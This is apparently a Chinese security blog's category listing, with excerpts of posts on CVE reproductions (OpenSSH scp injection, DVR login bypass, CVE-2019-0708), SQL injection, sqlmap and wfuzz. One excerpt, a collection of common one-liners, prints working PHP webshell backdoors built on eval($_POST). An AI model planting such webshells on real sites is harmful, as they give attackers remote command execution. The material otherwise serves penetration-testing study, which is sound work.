
InternetSafe
文章平均质量分 69
StriveBen
网安小白 会点技术 也会熬点鸡汤 持续学习中 欢迎交流,一起成长 获取本人联系方式以及微信交流群
展开
-
OpenSSH_scp命令注入漏洞复现(CVE-2020-15778)
该文章英文简单易懂,虽翻译之,大佬们轻喷文章首发公众号:striveben前言OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令,不过前提是需要知道ssh的登录密码。OpenSSh是用于使用SSH(Secure SHell)协议进行加密远程登录的免费开源实现。它可以有效保护登录及数据的安全。SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。影响范围OpenSSH.原创 2020-08-02 17:56:07 · 7497 阅读 · 7 评论 -
非对称加密和对称加密的区别
对称加密(Symmetric Cryptography),又称私钥加密 对称加密是最快速、最简单的一种加密方式,加密(encryption)与解密(decryption)用的是同样的密钥(secret key),这种方法在密码学中叫做对称加密算法。对称加密有很多种算法,由于它效率很高,所以被广泛使用在很多加密协议的核心当中。对称加密通常使用的是相对较小的密钥,一般小于256 bit。因为密钥越大...转载 2018-05-09 15:07:48 · 824 阅读 · 0 评论 -
常见一句话收集
前言收集常见的asp,php,jsp,aspx 的一句话木马 欢迎进群交流: 363034250php <?php eval($_POST[hh])?> <?php @eval($_POST[hh])?> <?$_POST['sa']($_POST['sb']);?> <?$_POST['sa']($_...原创 2018-04-26 07:29:02 · 813 阅读 · 0 评论 -
DVR登录绕过漏洞复现(CVE-2018-9995)
DVR登录绕过(CVE-2018-9995)欢迎进群交流技术: 363034250前言前两天关于DVR登录绕过的漏洞文章就有了,最近看到了它的POC,是阿根廷一个叫费尔南德斯的大牛在4.30更新在其博客上的,直接能够获取多种DVR的明文凭证(登录密码),于是我也尝试了一下,屡试不爽…漏洞复现感觉问题在,这些DVR的cookie都好简单,”uid=admin”,然后凭证都是明文…...原创 2018-05-11 14:48:46 · 5394 阅读 · 1 评论 -
HTTP头部详解
HTTP头部详解欢迎进群交流: 363034250HTTP(HyperTextTransferProtocol)是超文本传输协议的缩写,它用于传送WWW方式的数据,关于HTTP 协议的详细内容请参考RFC2616。HTTP协议采用了请求/响应模型。客户端向服务器发送一个请求,请求头包含请求的方法、URI、协议版本、以及包含请求修饰符、客户信息和内容的类似于MIME的消息结构。服务器以一个状...转载 2018-05-07 22:30:02 · 3385 阅读 · 0 评论 -
docker 基本使用--常用命令
dokcer 常用命令如果你想将一个容器转换为镜像,可以:docker commit &lt;container -id&gt; name(对该镜像的命名)docker run 中的 –rm :使用该命令,docker能在该container结束时自动清理其所产生的数据,适用于需要短期运行一个前台container;创建并连接容器、端口映射、绑定随机iddocker r...原创 2018-06-27 20:37:09 · 2231 阅读 · 0 评论 -
一次对asp+fck的简单渗透
最近一直没有更新文章,各位久等了。今天忙里偷闲,谷歌到了一个练手的网站,简单和大家分享下。文章首发本人公众号,如果感兴趣请在文末扫码添加。信息收集众所周知哈,渗透的第一步,也是很重要的一步,就是信息收集,通过这一步,找到了真实ip,服务器以及中间件版本(iis 7.5)同时看了下端口开放情况,都是常规端口,没啥异常,然后对该网站进行目录扫描发现了网站后台地址,如下图:不过没有后台密码,就先...原创 2018-12-25 00:16:55 · 632 阅读 · 0 评论 -
windows 任意文件读取漏洞复现
在复现windows 的最新0day(任意用户下,可以读取任意文件)之前,先简单介绍下windows 下用户管理需要的基本命令。文章首发公众号,欢迎大家关注,并进技术交流群(363034250),共同进步哈。windows 用户管理基本命令查看用户net user查看所有用户:查看用户权限net user xxx该命令可以查看用户的权限,如下图,在本地组成员...原创 2019-01-02 00:03:09 · 2673 阅读 · 0 评论 -
Windows ".contact"文件 HTML 链接注入远程执行代码
欢迎加技术交流群(363034250),共同进步哈。漏洞描述该漏洞位置是在创建联系人信息时,未对输入的电子邮件地址和网站内容进行严格的限制,导致HTML链接注入远程执行代码。漏洞复现影响系统:Windows 10,Windows 8,Windows 7和Windows Vista首先桌面右键,创建联系人:基本信息按需要填写,在电子邮件和网站一栏,分别填入可执行代码(弹出计算器):...原创 2019-01-24 16:22:32 · 1059 阅读 · 0 评论 -
CVE-2019-0708复现总结
周末有空便复现了下0708的洞,没想到到处是坑,而且这个漏洞有点鸡肋~~看其他师傅用win7复现的,能一次成功的几乎没有,可能是exp不稳定吧;但是我一直蓝屏,从未弹成功。。。环境搭建ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A...原创 2019-09-22 22:29:26 · 1541 阅读 · 0 评论 -
load data infile函数使用
mysql中load data file 使用欢迎进群交流: 363034250前言 有时候我们需要将大量数据批量写入数据库,直接使用程序语言和Sql写入往往很耗时间,其中有一种方案就是使用MySql Load data infile导入文件的形式导入数据,这样可大大缩短数据导入时间。基本语法load data [low_priority] [loc...原创 2018-04-24 22:06:40 · 4943 阅读 · 0 评论 -
Web常用的绝对路径收集
常用的绝对路径收集欢迎进群交流: 363034250Linux 绝对路径 描述 /etc/httpd/conf/httpd.conf 查看linux apache虚拟主机配置文件 /usr/local/apche/conf/httpd.conf 查看linux apache虚拟主机配置文件 /usr/local/resin/conf/re...原创 2018-04-24 12:01:40 · 2990 阅读 · 0 评论 -
kali 下metasploit (msf)初始化使用
首先启动postgresql,命令在图中;然后初始化数据库进入msf框架查看一下数据库状态如果不太熟悉,可以查看具体使用手册如果执行search时,很慢,而且还提示Module database cache not build yet的话,我们可以这样解决问题将数据库再次初始化,并且重新建一下cache,再试一下是不是很快了。原创 2017-06-14 21:37:19 · 20575 阅读 · 6 评论 -
metasploitable2 中mutillidae(owasp10)报错数据库不存在的问题
大家在使用metasploitable2 时,是不是也遇到了这样的问题经过查看metasploit数据库,发现该数据库是空的,报错肯定也是必然的但是发现有一个叫owasp10的数据库,而且里面的信息正是我们需要的,所以我们可以将mutillidae对应的数据库改为owasp10;更改数据库名很简单:找到$dbname变量,更改一下就可以了:原创 2017-06-14 21:45:43 · 1924 阅读 · 5 评论 -
Wfuzz 使用
前言Wfuzz是网站模糊测试爆破工具。https://github.com/xmendez/wfuzzwfuzz不仅仅是一个web扫描器:wfuzz能够通过发现并利用网站弱点/漏洞的方式帮助你使网站更加安全。wfuzz的漏洞扫描功能由插件支持。wfuzz是一个完全模块化的框架,这使得即使是Python初学者也能够进行开发和贡献代码。开发一个wfuzz插件是一件非常简单的事,通常...原创 2018-03-17 19:43:35 · 1699 阅读 · 0 评论 -
Wfuzz 使用
前言Wfuzz是网站模糊测试爆破工具。https://github.com/xmendez/wfuzzwfuzz不仅仅是一个web扫描器:wfuzz能够通过发现并利用网站弱点/漏洞的方式帮助你使网站更加安全。wfuzz的漏洞扫描功能由插件支持。wfuzz是一个完全模块化的框架,这使得即使是Python初学者也能够进行开发和贡献代码。开发一个wfuzz插件是一件非常简单的事,通常...原创 2018-03-17 21:41:47 · 7181 阅读 · 0 评论 -
sql手动注入常用步骤
前言提起sql注入,相信大家并不陌生,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,从而达到和服务器进行直接的交互.有可能存在SQL注入的数据库类型可以是Mysql,Mssql,Oracle,Postgress等等预备知识对mysql数据库有一定了解;对基本的sql语句有所了解;对url编码有了解:空格=‘%...原创 2018-03-22 14:17:12 · 13176 阅读 · 0 评论 -
sqlmap 基本使用手册
Sqlmap基本使用手册最近在学习如何更好地使用sqlmap,操作是在kali上进行的,遇到了一些问题,同大家分享。kali下sqlmap升级进入到sqlmap的安装目录cd /usr/share/sqlmap初始化仓库git init添加sqlmap地址git remote add origin https://github.com/sqlmapproject/sqlmap.git最后执行sqlm原创 2018-03-30 11:46:06 · 5405 阅读 · 0 评论 -
mysql注入的一些基础知识
mysql注入的一些基础知识。(1)注入的分类下面这个是阿德玛表哥的一段话,个人认为分类已经是够全面了。理解不了跳过,当你完全看完整个学习过程后再回头看这段。能完全理解下面的这些每个分类,对每个分类有属于你的认知和了解的时候,你就算是小有成就了,当然仅仅是sql注入上。基于从服务器接收到的响应 ▲基于错误的SQL注入▲联合查询的类型▲堆查询注射▲SQL盲注•基于...转载 2018-03-26 16:37:11 · 330 阅读 · 0 评论 -
报错型盲注原理分析
前言众所周知,盲注并不会返回错误信息,使得sql注入的难度提高。而报错型注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果;当然其他类型的数据库也存在相应的问题,在此我...原创 2018-03-26 19:33:05 · 738 阅读 · 0 评论